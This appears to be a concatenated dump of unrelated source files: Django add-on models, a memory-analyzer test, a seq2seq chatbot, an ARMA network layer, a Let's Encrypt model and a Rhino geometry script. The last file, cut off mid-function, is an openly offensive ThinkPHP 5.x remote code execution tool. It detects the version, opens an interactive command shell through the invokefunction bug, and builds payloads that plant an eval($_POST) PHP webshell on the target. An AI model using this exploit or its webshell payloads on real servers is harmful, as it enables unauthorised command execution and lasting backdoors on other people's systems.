class DeniedGuid(ModelBase):
guid = models.CharField(max_length=255, unique=True)
comments = models.TextField(default='', blank=True)
class Meta:
db_table = 'denied_guids'
def __unicode__(self):
return self.guid
class Category(OnChangeMixin, ModelBase):
# Old name translations, we now have constants translated via gettext, but
# this is for backwards-compatibility, for categories which have a weird
# type/application/slug combo that is not in the constants.
db_name = TranslatedField(db_column='name')
slug = SlugField(max_length=50,
help_text='Used in Category URLs.')
type = models.PositiveIntegerField(db_column='addontype_id',
choices=do_dictsort(amo.ADDON_TYPE))
application = models.PositiveIntegerField(choices=amo.APPS_CHOICES,
null=True, blank=True,
db_column='application_id')
count = models.IntegerField('Addon count', default=0)
weight = models.IntegerField(
default=0, help_text='Category weight used in sort ordering')
misc = models.BooleanField(default=False)
addons = models.ManyToManyField(Addon, through='AddonCategory')
class Meta:
db_table = 'categories'
verbose_name_plural = 'Categories'
@property
def name(self):
try:
value = CATEGORIES[self.application][self.type][self.slug].name
except KeyError:
# If we can't find the category in the constants dict, fall back
# to the db field.
value = self.db_name
return unicode(value)
def __unicode__(self):
return unicode(self.name)
def get_url_path(self):
try:
type = amo.ADDON_SLUGS[self.type]
except KeyError:
type = amo.ADDON_SLUGS[amo.ADDON_EXTENSION]
return reverse('browse.%s' % type, args=[self.slug])
def to_static_category(self):
"""Return the corresponding StaticCategory instance from a Category."""
try:
staticcategory = CATEGORIES[self.application][self.type][self.slug]
except KeyError:
staticcategory = None
return staticcategory
@classmethod
def from_static_category(cls, static_category):
"""Return a Category instance created from a StaticCategory.
Does not save it into the database. Useful in tests."""
return cls(**static_category.__dict__)
dbsignals.pre_save.connect(save_signal, sender=Category,
dispatch_uid='category_translations')
class Preview(ModelBase):
addon = models.ForeignKey(Addon, related_name='previews')
caption = TranslatedField()
position = models.IntegerField(default=0)
sizes = JSONField(max_length=25, default={})
class Meta:
db_table = 'previews'
ordering = ('position', 'created')
def _image_url(self, url_template):
if self.modified is not None:
modified = int(time.mktime(self.modified.timetuple()))
else:
modified = 0
args = [self.id / 1000, self.id, modified]
return url_template % tuple(args)
def _image_path(self, url_template):
args = [self.id / 1000, self.id]
return url_template % tuple(args)
def as_dict(self, src=None):
d = {'full': urlparams(self.image_url, src=src),
'thumbnail': urlparams(self.thumbnail_url, src=src),
'caption': unicode(self.caption)}
return d
@property
def thumbnail_url(self):
template = (
helpers.user_media_url('previews') +
'thumbs/%s/%d.png?modified=%s')
return self._image_url(template)
@property
def image_url(self):
template = (
helpers.user_media_url('previews') +
'full/%s/%d.png?modified=%s')
return self._image_url(template)
@property
def thumbnail_path(self):
template = os.path.join(
helpers.user_media_path('previews'),
'thumbs',
'%s',
'%d.png'
)
return self._image_path(template)
@property
def image_path(self):
template = os.path.join(
helpers.user_media_path('previews'),
'full',
'%s',
'%d.png'
)
return self._image_path(template)
@property
def thumbnail_size(self):
return self.sizes.get('thumbnail', []) if self.sizes else []
@property
def image_size(self):
return self.sizes.get('image', []) if self.sizes else []
dbsignals.pre_save.connect(save_signal, sender=Preview,
dispatch_uid='preview_translations')
def delete_preview_files(sender, instance, **kw):
"""On delete of the Preview object from the database, unlink the image
and thumb on the file system """
for filename in [instance.image_path, instance.thumbnail_path]:
if storage.exists(filename):
log.info('Removing filename: %s for preview: %s'
% (filename, instance.pk))
storage.delete(filename)
models.signals.post_delete.connect(delete_preview_files,
sender=Preview,
dispatch_uid='delete_preview_files')
class AppSupport(ModelBase):
"""Cache to tell us if an add-on's current version supports an app."""
addon = models.ForeignKey(Addon, on_delete=models.CASCADE)
app = models.PositiveIntegerField(choices=amo.APPS_CHOICES,
db_column='app_id')
min = models.BigIntegerField("Minimum app version", null=True)
max = models.BigIntegerField("Maximum app version", null=True)
class Meta:
db_table = 'appsupport'
unique_together = ('addon', 'app')
class Charity(ModelBase):
name = models.CharField(max_length=255)
url = models.URLField()
paypal = models.CharField(max_length=255)
class Meta:
db_table = 'charities'
@property
def outgoing_url(self):
if self.pk == amo.FOUNDATION_ORG:
return self.url
return get_outgoing_url(unicode(self.url))
class DeniedSlug(ModelBase):
name = models.CharField(max_length=255, unique=True, default='')
class Meta:
db_table = 'addons_denied_slug'
def __unicode__(self):
return self.name
@classmethod
def blocked(cls, slug):
return slug.isdigit() or cls.objects.filter(name=slug).exists()
class FrozenAddon(models.Model):
"""Add-ons in this table never get a hotness score."""
addon = models.ForeignKey(Addon)
class Meta:
db_table = 'frozen_addons'
def __unicode__(self):
return 'Frozen: %s' % self.addon_id
@receiver(dbsignals.post_save, sender=FrozenAddon)
def freezer(sender, instance, **kw):
# Adjust the hotness of the FrozenAddon.
if instance.addon_id:
Addon.objects.get(id=instance.addon_id).update(hotness=0)
class CompatOverride(ModelBase):
"""Helps manage compat info for add-ons not hosted on AMO."""
name = models.CharField(max_length=255, blank=True, null=True)
guid = models.CharField(max_length=255, unique=True)
addon = models.ForeignKey(Addon, blank=True, null=True,
help_text='Fill this out to link an override '
'to a hosted add-on')
class Meta:
db_table = 'compat_override'
unique_together = ('addon', 'guid')
def save(self, *args, **kw):
if not self.addon:
qs = Addon.objects.filter(guid=self.guid)
if qs:
self.addon = qs[0]
return super(CompatOverride, self).save(*args, **kw)
def __unicode__(self):
if self.addon:
return unicode(self.addon)
elif self.name:
return '%s (%s)' % (self.name, self.guid)
else:
return self.guid
def is_hosted(self):
"""Am I talking about an add-on on AMO?"""
return bool(self.addon_id)
@staticmethod
def transformer(overrides):
if not overrides:
return
id_map = dict((o.id, o) for o in overrides)
qs = CompatOverrideRange.objects.filter(compat__in=id_map)
for compat_id, ranges in sorted_groupby(qs, 'compat_id'):
id_map[compat_id].compat_ranges = list(ranges)
# May be filled in by a transformer for performance.
@cached_property
def compat_ranges(self):
return list(self._compat_ranges.all())
def collapsed_ranges(self):
"""Collapse identical version ranges into one entity."""
Range = collections.namedtuple('Range', 'type min max apps')
AppRange = collections.namedtuple('AppRange', 'app min max')
rv = []
def sort_key(x):
return (x.min_version, x.max_version, x.type)
for key, compats in sorted_groupby(self.compat_ranges, key=sort_key):
compats = list(compats)
first = compats[0]
item = Range(first.override_type(), first.min_version,
first.max_version, [])
for compat in compats:
app = AppRange(amo.APPS_ALL[compat.app],
compat.min_app_version, compat.max_app_version)
item.apps.append(app)
rv.append(item)
return rv
OVERRIDE_TYPES = (
(0, 'Compatible (not supported)'),
(1, 'Incompatible'),
)
class CompatOverrideRange(ModelBase):
"""App compatibility for a certain version range of a RemoteAddon."""
compat = models.ForeignKey(CompatOverride, related_name='_compat_ranges')
type = models.SmallIntegerField(choices=OVERRIDE_TYPES, default=1)
min_version = models.CharField(
max_length=255, default='0',
help_text=u'If not "0", version is required to exist for the override'
u' to take effect.')
max_version = models.CharField(
max_length=255, default='*',
help_text=u'If not "*", version is required to exist for the override'
u' to take effect.')
app = models.PositiveIntegerField(choices=amo.APPS_CHOICES,
db_column='app_id')
min_app_version = models.CharField(max_length=255, default='0')
max_app_version = models.CharField(max_length=255, default='*')
class Meta:
db_table = 'compat_override_range'
def override_type(self):
"""This is what Firefox wants to see in the XML output."""
return {0: 'compatible', 1: 'incompatible'}[self.type]
class IncompatibleVersions(ModelBase):
"""
Denormalized table to join against for fast compat override filtering.
This was created to be able to join against a specific version record since
the CompatOverrideRange can be wildcarded (e.g. 0 to *, or 1.0 to 1.*), and
addon versioning isn't as consistent as Firefox versioning to trust
`version_int` in all cases. So extra logic needed to be provided for when
a particular version falls within the range of a compatibility override.
"""
version = models.ForeignKey(Version, related_name='+')
app = models.PositiveIntegerField(choices=amo.APPS_CHOICES,
db_column='app_id')
min_app_version = models.CharField(max_length=255, blank=True, default='0')
max_app_version = models.CharField(max_length=255, blank=True, default='*')
min_app_version_int = models.BigIntegerField(blank=True, null=True,
editable=False, db_index=True)
max_app_version_int = models.BigIntegerField(blank=True, null=True,
editable=False, db_index=True)
class Meta:
db_table = 'incompatible_versions'
def __unicode__(self):
return u'<IncompatibleVersion V:%s A:%s %s-%s>' % (
self.version.id, self.app.id, self.min_app_version,
self.max_app_version)
def save(self, *args, **kw):
self.min_app_version_int = version_int(self.min_app_version)
self.max_app_version_int = version_int(self.max_app_version)
return super(IncompatibleVersions, self).save(*args, **kw)
def update_incompatible_versions(sender, instance, **kw):
if not instance.compat.addon_id:
return
if not instance.compat.addon.type == amo.ADDON_EXTENSION:
return
from . import tasks
versions = instance.compat.addon.versions.values_list('id', flat=True)
for chunk in chunked(versions, 50):
tasks.update_incompatible_appversions.delay(chunk)
models.signals.post_save.connect(update_incompatible_versions,
sender=CompatOverrideRange,
dispatch_uid='cor_update_incompatible')
models.signals.post_delete.connect(update_incompatible_versions,
sender=CompatOverrideRange,
dispatch_uid='cor_update_incompatible')
def track_new_status(sender, instance, *args, **kw):
if kw.get('raw'):
# The addon is being loaded from a fixure.
return
if kw.get('created'):
track_addon_status_change(instance)
models.signals.post_save.connect(track_new_status,
sender=Addon,
dispatch_uid='track_new_addon_status')
@Addon.on_change
def track_status_change(old_attr=None, new_attr=None, **kw):
if old_attr is None:
old_attr = {}
if new_attr is None:
new_attr = {}
new_status = new_attr.get('status')
old_status = old_attr.get('status')
if new_status != old_status:
track_addon_status_change(kw['instance'])
def track_addon_status_change(addon):
statsd.incr('addon_status_change.all.status_{}'
.format(addon.status))
| 37.593346 | 79 | 0.622812 |
ace75a2f90a04bc492c696b57934ce463193ca98 | 2,331 | py | Python | tests.py | delimitry/python-memory-analyzer | d593f1aa327111c168663c927d848294b7f7f7de | [
"MIT"
] | 2 | 2019-10-01T21:13:48.000Z | 2019-10-03T00:56:14.000Z | tests.py | delimitry/python-memory-analyzer | d593f1aa327111c168663c927d848294b7f7f7de | [
"MIT"
] | null | null | null | tests.py | delimitry/python-memory-analyzer | d593f1aa327111c168663c927d848294b7f7f7de | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#-*- coding: utf8 -*-
from __future__ import print_function, unicode_literals
import ctypes
import struct
import unittest
from io import BytesIO
from objects import PyStringObject, PyCommonUnicodeObject, PY3
def sizeof_x64_mock(arg):
if arg in (
ctypes.c_size_t,
ctypes.c_void_p,
ctypes.c_long,
ctypes.c_char_p,
ctypes.c_wchar_p,
):
return 8
elif arg == ctypes.c_int:
return 4
return 8
def ctypes_x64_mock(func):
def wrapper(*args, **kwargs):
orig_sizeof = ctypes.sizeof
ctypes.sizeof = sizeof_x64_mock
func(*args, **kwargs)
ctypes.sizeof = orig_sizeof
return wrapper
class Test(unittest.TestCase):
"""
Test python memory analyzer
"""
@ctypes_x64_mock
def test_py_str_read_py27(self):
mem_dump = BytesIO(
b'\x01\x00\x00\x00\x00\x00\x00\x00`\x9c\x8f\x00\x00\x00\x00\x00'
b'\x03\x00\x00\x00\x00\x00\x00\x00\xd7\xb2x\xa1P`*\x14'
b'\x01\x00\x00\x00asd\x00'
)
obj = PyStringObject.read(mem_dump)
self.assertEqual(obj.ob_refcnt, 1)
self.assertEqual(obj.ob_type, 0x8f9c60)
self.assertEqual(obj.ob_size, 3)
self.assertEqual(obj.ob_shash, 0x142a6050a178b2d7)
self.assertEqual(obj.ob_sstate, 1)
self.assertEqual(obj.ob_sval.decode('utf-8'), 'asd')
@ctypes_x64_mock
def test_py_unicode_read_py37(self):
mem_dump = BytesIO(
b'\x01\x00\x00\x00\x00\x00\x00\x00\xc0\x92\xa4\x00\x00\x00\x00\x00'
b'\x03\x00\x00\x00\x00\x00\x00\x00\xc5\xf2\xda3\xc4\x1f\xff\xeb\xa8'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x000\x041\x042\x04\x00\x001\x042\x04\x00'
)
obj = PyCommonUnicodeObject.read(mem_dump)
self.assertEqual(obj.ob_refcnt, 1)
self.assertEqual(obj.ob_type, 0x0000000000a492c0)
self.assertEqual(obj.length, 3)
self.assertEqual(obj.hash, 0xebff1fc433daf2c5)
self.assertEqual(obj.state.value, 0b10101000)
self.assertEqual(obj.data.decode('utf-8'), 'абв')
if __name__ == '__main__':
unittest.main(verbosity=2)
| 30.671053 | 80 | 0.642214 |
ace75b2481e2e71c921e54dca8205c7f9e4c1041 | 6,095 | py | Python | sequence2sequence/model.py | Pankajchandan/chatbot | 6e2daf1b8aac0259d8e1b1793202d9760ee6a91b | [
"MIT"
] | null | null | null | sequence2sequence/model.py | Pankajchandan/chatbot | 6e2daf1b8aac0259d8e1b1793202d9760ee6a91b | [
"MIT"
] | null | null | null | sequence2sequence/model.py | Pankajchandan/chatbot | 6e2daf1b8aac0259d8e1b1793202d9760ee6a91b | [
"MIT"
] | null | null | null | from __future__ import print_function
import time
import numpy as np
import tensorflow as tf
import sequence2sequence.config as config
class ChatBotModel(object):
def __init__(self, forward_only, batch_size):
"""forward_only: if set, we do not construct the backward pass in the model.
"""
print('Initializing graph....')
self.fw_only = forward_only
self.batch_size = batch_size
if self.fw_only == True:
self.KEEP_PROB = 1.0
else:
self.KEEP_PROB = 0.5
def _create_placeholders(self):
# Feeds for inputs. It's a list of placeholders
print('Create placeholders')
self.encoder_inputs = [tf.placeholder(tf.int32, shape=[None], name='encoder{}'.format(i))
for i in range(config.BUCKETS[-1][0])]
self.decoder_inputs = [tf.placeholder(tf.int32, shape=[None], name='decoder{}'.format(i))
for i in range(config.BUCKETS[-1][1] + 1)]
self.decoder_masks = [tf.placeholder(tf.float32, shape=[None], name='mask{}'.format(i))
for i in range(config.BUCKETS[-1][1] + 1)]
# Our targets are decoder inputs shifted by one (to ignore <s> symbol)
self.targets = self.decoder_inputs[1:]
def _inference(self):
print('Create inference')
# If we use sampled softmax, we need an output projection.
# Sampled softmax only makes sense if we sample less than vocabulary size.
if config.NUM_SAMPLES > 0 and config.NUM_SAMPLES < config.DEC_VOCAB:
w = tf.get_variable('proj_w', [config.HIDDEN_SIZE, config.DEC_VOCAB])
b = tf.get_variable('proj_b', [config.DEC_VOCAB])
self.output_projection = (w, b)
def sampled_loss(labels, logits):
labels = tf.reshape(labels, [-1, 1])
return tf.nn.sampled_softmax_loss(tf.transpose(w), b, labels, logits,
config.NUM_SAMPLES, config.DEC_VOCAB)
self.softmax_loss_function = sampled_loss
single_cell = tf.nn.rnn_cell.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(config.HIDDEN_SIZE),output_keep_prob=self.KEEP_PROB)
self.cell = tf.nn.rnn_cell.MultiRNNCell([single_cell] * config.NUM_LAYERS)
def _create_loss(self):
print('Creating loss...')
start = time.time()
def _seq2seq_f(encoder_inputs, decoder_inputs, do_decode):
return tf.contrib.legacy_seq2seq.embedding_attention_seq2seq(
encoder_inputs, decoder_inputs, self.cell,
num_encoder_symbols=config.ENC_VOCAB,
num_decoder_symbols=config.DEC_VOCAB,
#embedding_size=config.HIDDEN_SIZE,
embedding_size=config.EMBED_SIZE,
output_projection=self.output_projection,
feed_previous=do_decode)
if self.fw_only:
self.outputs, self.losses = tf.contrib.legacy_seq2seq.model_with_buckets(
self.encoder_inputs,
self.decoder_inputs,
self.targets,
self.decoder_masks,
config.BUCKETS,
lambda x, y: _seq2seq_f(x, y, True),
softmax_loss_function=self.softmax_loss_function)
# If we use output projection, we need to project outputs for decoding.
if self.output_projection:
for bucket in range(len(config.BUCKETS)):
self.outputs[bucket] = [tf.matmul(output,
self.output_projection[0]) + self.output_projection[1]
for output in self.outputs[bucket]]
else:
self.outputs, self.losses = tf.contrib.legacy_seq2seq.model_with_buckets(
self.encoder_inputs,
self.decoder_inputs,
self.targets,
self.decoder_masks,
config.BUCKETS,
lambda x, y: _seq2seq_f(x, y, False),
softmax_loss_function=self.softmax_loss_function)
print('Time:', time.time() - start)
def _creat_optimizer(self):
print('Creating optimizer... ')
with tf.variable_scope('training') as scope:
self.global_step = tf.Variable(0, dtype=tf.int32, trainable=False, name='global_step')
if not self.fw_only:
self.optimizer = tf.train.AdamOptimizer(config.LR)
#self.optimizer = tf.train.GradientDescentOptimizer(config.LR)
trainables = tf.trainable_variables()
self.gradient_norms = []
self.train_ops = []
start = time.time()
for bucket in range(len(config.BUCKETS)):
clipped_grads, norm = tf.clip_by_global_norm(tf.gradients(self.losses[bucket],
trainables),
config.MAX_GRAD_NORM)
self.gradient_norms.append(norm)
self.train_ops.append(self.optimizer.apply_gradients(zip(clipped_grads, trainables),
global_step=self.global_step))
print('Creating opt for bucket {} took {} seconds'.format(bucket, time.time() - start))
start = time.time()
def _create_summary(self):
pass
def build_graph(self):
self._create_placeholders()
self._inference()
self._create_loss()
self._creat_optimizer()
self._create_summary()
| 49.552846 | 128 | 0.539459 |
ace75c3fb7827df5e944ed9bb9fb1eac9cff1c0c | 6,251 | py | Python | code/network/backbone/arma.py | bshantam97/arma_networks_image_segmentation | f1ac5396afe2a77f4b809a21e9d048fa75c48781 | [
"MIT"
] | 3 | 2020-08-17T16:09:00.000Z | 2021-02-02T04:52:17.000Z | code/network/backbone/arma.py | bshantam97/arma_networks_image_segmentation | f1ac5396afe2a77f4b809a21e9d048fa75c48781 | [
"MIT"
] | 1 | 2020-10-14T02:21:46.000Z | 2020-10-14T02:21:46.000Z | code/network/backbone/arma.py | bshantam97/arma_networks_image_segmentation | f1ac5396afe2a77f4b809a21e9d048fa75c48781 | [
"MIT"
] | 1 | 2020-10-29T04:37:21.000Z | 2020-10-29T04:37:21.000Z | # header files
import math
import torch
import torch.nn as nn
class ARMA2d(nn.Module):
def __init__(self, in_channels, out_channels, w_kernel_size=3, w_padding_mode='zeros', w_padding=0, w_stride=1, w_dilation=1, w_groups=1, bias=False, a_kernel_size=3, a_padding_mode='circular', a_padding=0, a_stride=1, a_dilation=1):
"""
Initialization of 2D-ARMA layer.
"""
super(ARMA2d, self).__init__()
self.moving_average = nn.Conv2d(in_channels, out_channels, w_kernel_size, padding=w_padding, stride=w_stride, dilation=w_dilation, groups=w_groups, bias=bias)
self.autoregressive = AutoRegressive2d(out_channels, a_kernel_size, padding=a_padding, padding_mode=a_padding_mode, stride=a_stride, dilation=a_dilation)
def forward(self, x):
"""
Computation of 2D-ARMA layer.
"""
x = self.moving_average(x)
x = self.autoregressive(x)
return x
class AutoRegressive2d(nn.Module):
def __init__(self, channels, kernel_size=3, padding=0, padding_mode='circular', stride=1, dilation=1):
"""
Initialization of 2D-AutoRegressive layer.
"""
super(AutoRegressive2d, self).__init__()
if padding_mode == "circular":
self.a = AutoRegressive_circular(channels, kernel_size, padding, stride, dilation)
elif padding_mode == "reflect":
self.a = AutoRegressive_reflect(channels, kernel_size, padding, stride, dilation)
else:
raise NotImplementedError
def forward(self, x):
"""
Computation of 2D-AutoRegressive layer.
"""
x = self.a(x)
return x
class AutoRegressive_circular(nn.Module):
def __init__(self, channels, kernel_size=3, padding=0, stride=1, dilation=1):
"""
Initialization of a 2D-AutoRegressive layer (with circular padding).
"""
super(AutoRegressive_circular, self).__init__()
self.alpha = nn.Parameter(torch.Tensor(channels, kernel_size//2, 4))
self.set_parameters()
def set_parameters(self):
"""
Initialization of the learnable parameters.
"""
nn.init.zeros_(self.alpha)
def forward(self, x):
"""
Computation of the 2D-AutoRegressive layer (with circular padding).
"""
x = autoregressive_circular(x, self.alpha)
return x
def autoregressive_circular(x, alpha):
"""
Computation of a 2D-AutoRegressive layer (with circular padding).
"""
if x.size()[-2] < alpha.size()[1] * 2 + 1 or x.size()[-1] < alpha.size()[1] * 2 + 1:
return x
# There're 4 chunks, each chunk is [T, P, 1]
alpha = alpha.tanh() / math.sqrt(2)
chunks = torch.chunk(alpha, alpha.size()[-1], -1)
# size: [T, P, 1]
A_x_left = (chunks[0]*math.cos(-math.pi/4)-chunks[1]*math.sin(-math.pi/4))
A_x_right = (chunks[0]*math.sin(-math.pi/4)+chunks[1]*math.cos(-math.pi/4))
A_y_left = (chunks[2]*math.cos(-math.pi/4)-chunks[3]*math.sin(-math.pi/4))
A_y_right = (chunks[2]*math.sin(-math.pi/4)+chunks[3]*math.cos(-math.pi/4))
# zero padding + circulant shift:
# [A_x_left 1 A_x_right] -> [1 A_x_right 0 0 ... 0 A_x_left]
# size: [T, P, 3]->[T, P, I1] or [T, P, I2]
A_x = torch.cat((torch.ones(chunks[0].size(), device=alpha.device), A_x_right, torch.zeros(chunks[0].size()[0], chunks[0].size()[1], x.size()[-2] - 3, device=alpha.device), A_x_left), -1)
A_y = torch.cat((torch.ones(chunks[2].size(), device = alpha.device), A_y_right, torch.zeros(chunks[2].size()[0], chunks[2].size()[1], x.size()[-1] - 3, device=alpha.device), A_y_left), -1)
# size: [T, P, I1] + [T, P, I2] -> [T, P, I1, I2]
A = torch.einsum('tzi,tzj->tzij',(A_x, A_y))
# Complex Division: FFT/FFT -> irFFT
A_s = torch.chunk(A, A.size()[1], 1)
for i in range(A.size()[1]):
x = ar_circular.apply(x, torch.squeeze(A_s[i], 1))
return x
def complex_division(x, A, trans_deno=False):
a, b = torch.chunk(x, 2, -1)
c, d = torch.chunk(A, 2, -1)
if trans_deno:
# [a bj] / [c -dj] -> [ac-bd/(c^2+d^2) (bc+ad)/(c^2+d^2)j]
res_l = (a * c - b * d) / (c * c + d * d)
res_r = (b * c + a * d) / (c * c + d * d)
else: # [a bj] / [c dj] -> [ac+bd/(c^2+d^2) (bc-ad)/(c^2+d^2)j]
res_l = (a * c + b * d) / (c * c + d * d)
res_r = (b * c - a * d) / (c * c + d * d)
res = torch.cat((res_l, res_r), -1)
return res
def complex_multiplication(x, A, trans_deno=False):
a, b = torch.chunk(x, 2, -1)
c, d = torch.chunk(A, 2, -1)
if trans_deno:
# [a bj]*[c -dj] -> [ac+bd (bc-ad)j]
res_l = a * c + b * d
res_r = b * c - a * d
else: # [a bj]*[c dj] -> [ac-bd (ad+bc)j]
res_l = a * c - b * d
res_r = b * c + a * d
res = torch.cat((res_l,res_r), -1)
return res
class ar_circular(torch.autograd.Function):
# x size: [M, T, I1, I2]
# a size:[T, I1, I2]
@staticmethod
def forward(ctx, x, a):
X = torch.rfft(x, 2, onesided=False) # size:[M, T, I1, I2, 2]
A = torch.rfft(a, 2, onesided=False) # size:[T, I1, I2, 2]
Y = complex_division(X, A) # size:[M, T, I1, I2, 2]
y = torch.irfft(Y, 2, onesided=False) # size:[M, T, I1, I2]
ctx.save_for_backward(A, Y)
return y
@staticmethod
def backward(ctx, grad_y):
"""
{grad_a} * a^T = - grad_y * y^T
[T, I1, I2] * [T, I1, I2] = [M, T, I1, I2] * [M, T, I1, I2]
a^T * {grad_x} = grad_y
[T, I1, I2] * [M, T, I1, I2] = [M, T, I1, I2]
intermediate = grad_y / a^T
"""
A, Y = ctx.saved_tensors
grad_x = grad_a = None
grad_Y = torch.rfft(grad_y, 2, onesided = False)
intermediate = complex_division(grad_Y, A, trans_deno = True) # size: [M, T, I1, I2]
grad_x = torch.irfft(intermediate, 2, onesided=False)
intermediate = - complex_multiplication(intermediate, Y, trans_deno = True) # size: [M, T, I1, I2]
grad_a = torch.irfft(intermediate.sum(0), 2, onesided = False) # size:[T, I1, I2]
return grad_x, grad_a
| 37.431138 | 237 | 0.567109 |
ace75c9f3d21a0a01c7be48953762a72280bc68b | 1,568 | py | Python | letsencrypt/models.py | urda/django-letsencrypt | 4a7547075fb3090783ac0984dbd2db99fddc8865 | [
"Apache-2.0"
] | 72 | 2016-12-05T16:17:32.000Z | 2021-11-12T21:33:21.000Z | letsencrypt/models.py | urda/django-letsencrypt | 4a7547075fb3090783ac0984dbd2db99fddc8865 | [
"Apache-2.0"
] | 112 | 2016-11-21T02:10:18.000Z | 2021-05-31T10:06:51.000Z | letsencrypt/models.py | urda/django-letsencrypt | 4a7547075fb3090783ac0984dbd2db99fddc8865 | [
"Apache-2.0"
] | 10 | 2017-02-27T20:15:02.000Z | 2021-06-09T01:25:08.000Z | """
Copyright 2016-2020 Peter Urda
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from django.db import models
from django.urls import (
reverse,
NoReverseMatch,
)
class AcmeChallenge(models.Model):
"""
Simple model to handle Let's Encrypt .well-known/acme-challenge objects
"""
challenge = models.CharField(
help_text='The identifier for this challenge',
unique=True,
max_length=255,
)
response = models.CharField(
help_text='The response expected for this challenge',
max_length=255,
)
def __str__(self):
return self.challenge
def get_acme_url(self):
"""
Get the URL to this ACME challenge
:return: The URL as a string
"""
try:
return reverse(
viewname='detail',
current_app='letsencrypt',
args=[self.challenge],
)
except NoReverseMatch:
return ''
class Meta:
verbose_name = 'ACME Challenge'
verbose_name_plural = 'ACME Challenges'
| 26.133333 | 75 | 0.652423 |
ace75cbc92a3ec4f137658d22635107a88eca71f | 785 | py | Python | src/day_2/day_2_01/01_coons_patch_in_order.py | BlockResearchGroup/AAG2018 | f4d1188798593b4aec019aa8bfe091305330b374 | [
"MIT"
] | 1 | 2018-10-01T16:16:21.000Z | 2018-10-01T16:16:21.000Z | src/day_2/day_2_01/01_coons_patch_in_order.py | compas-Workshops/AAG2018 | f4d1188798593b4aec019aa8bfe091305330b374 | [
"MIT"
] | null | null | null | src/day_2/day_2_01/01_coons_patch_in_order.py | compas-Workshops/AAG2018 | f4d1188798593b4aec019aa8bfe091305330b374 | [
"MIT"
] | 2 | 2018-09-22T22:12:11.000Z | 2018-11-30T10:31:00.000Z | import rhinoscriptsyntax as rs
from compas.geometry import discrete_coons_patch
from compas.utilities import geometric_key
from compas.datastructures import Mesh
from compas_rhino.artists.meshartist import MeshArtist
if __name__ == '__main__':
# division in both directions
div = 15
# select curves
crvs = rs.GetObjects("Select four curves (in cw order)", 4)
# divide curves
sets_pts = [rs.DivideCurve(crv, div) for crv in crvs]
# create coons patch
ab, bc, dc, ad = sets_pts
points, faces = discrete_coons_patch(ab, bc, dc, ad)
# create mesh object from points and faces
mesh = Mesh.from_vertices_and_faces(points, faces)
# draw coons mesh
artist = MeshArtist(mesh, layer='coons_mesh')
artist.draw()
| 23.787879 | 63 | 0.699363 |
ace75d6111458e48b89cddccfc9fa4e3d46eea54 | 3,862 | py | Python | tp5x.py | zyazhb/thinkphp5-poc | 131669a8ec7498b7f121c9633a4e52d117dfcda3 | [
"Apache-2.0"
] | 8 | 2019-06-19T01:28:34.000Z | 2020-12-14T10:11:34.000Z | tp5x.py | zyazhb/thinkphp5-poc | 131669a8ec7498b7f121c9633a4e52d117dfcda3 | [
"Apache-2.0"
] | null | null | null | tp5x.py | zyazhb/thinkphp5-poc | 131669a8ec7498b7f121c9633a4e52d117dfcda3 | [
"Apache-2.0"
] | 3 | 2019-07-31T01:27:03.000Z | 2020-11-23T13:13:45.000Z | #ThinkPHP 5.x < v5.0.23,v5.1.31 Remote Code Execution
#v5.x below v5.0.23,v5.1.31 shell BY-ZYA
import requests
import re
import optparse
import time
def test_url(url,v):
num = 0
f = open("thinkphp_poc.txt")
#url = input('Your taget name:(e.g.http://magic-mirro.com/thinkphp/public/index.php):')
#url = "http://magic-mirro.com/thinkphp/public/index.php"
r=requests.get(url + "?s=version_test")
version = re.findall('V[0-9].[0-9].[0-9]{1,2}',r.text)
if (version):
print("Version detected:"+ str(version))
else:
print('Version seems can not be detected!')
exit()
time.sleep(1)
for exp in f:
if(v):
print ("[o]Trying poc: " + url + exp)
try:
r=requests.get(url + exp)
except:
continue
exist = re.findall('HttpException ',r.text) or re.findall('System Error',r.text)
#print(exist)
#exist = re.findall('<br/>\\n(.*?)</p>',content)
if (exist):
if(v):
print('[-]Failed\n')
continue
else:
print("[+]Found:"+ url + exp + "\n[+]Seem Exist!\n")
num=num+1
print("[+]Response:\n"+r.text + '\n'+ '-'*200)
print("[+++]Test Done!" + str(num) + " poc(s) seem can be use")
def getshell(url):
#url = input('Your taget name:(e.g.http://magic-mirro.com/thinkphp/public/index.php):')
while (True):
cmd = input('\nShell by-zya$')
exp = "?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php -r\'system(\""+ cmd +"\");'"
r=requests.get(url + exp)
print(r.text)
def upload(url,passwd):
exp1 = '?s=index/\\think\\template\driver\\file/write&cacheFile=bak1.php&content=<?php @eval($_POST['+passwd+']);?>'
exp2 = '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=bak2.php&vars[1][]=<?php @eval($_POST['+passwd+']);?>'
exp3 = '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo \'<?php @eval($_POST['+passwd+']);?>\'>bak3.php'
explist = [exp1,exp2,exp3]
for exp in explist:
if(v):
print ("[o]Trying exp: " + url + exp)
try:
r=requests.get(url + exp)
except:
continue
exist = re.findall('Permission denied ',r.text) or re.findall('\template\driver\file',r.text)
#print(exist)
#exist = re.findall('<br/>\\n(.*?)</p>',content)
if (exist):
if(v):
print('[-]Failed\n')
continue
else:
print("[+]Found:"+ url + exp + "\n[+]Seem Exist!\n")
num=num+1
print("[+]Response:\n"+r.text + '\n'+ '-'*200)
print("[+++]Test Done!" + str(num) + " poc(s) seem can be use")
def main():
parser = optparse.OptionParser("ThinkPHP 5.x RCE exp by ZYA\n useage %prog "+"-u <url>\n -h <help>")
parser.add_option('-u', dest='u', type='string', help='Target URL')
parser.add_option('-v', dest='v', action='store_true', help='Show trying url detail')
parser.add_option('--shell', dest='shell', action='store_true', help='Prompt for an interactive operating system shell')
parser.add_option('--upload', dest='upload', help='Prompt for an interactive operating system shell')
#parser.add_option('--s2', dest='s2', type='string', help='specify string2')
(options, args) = parser.parse_args()
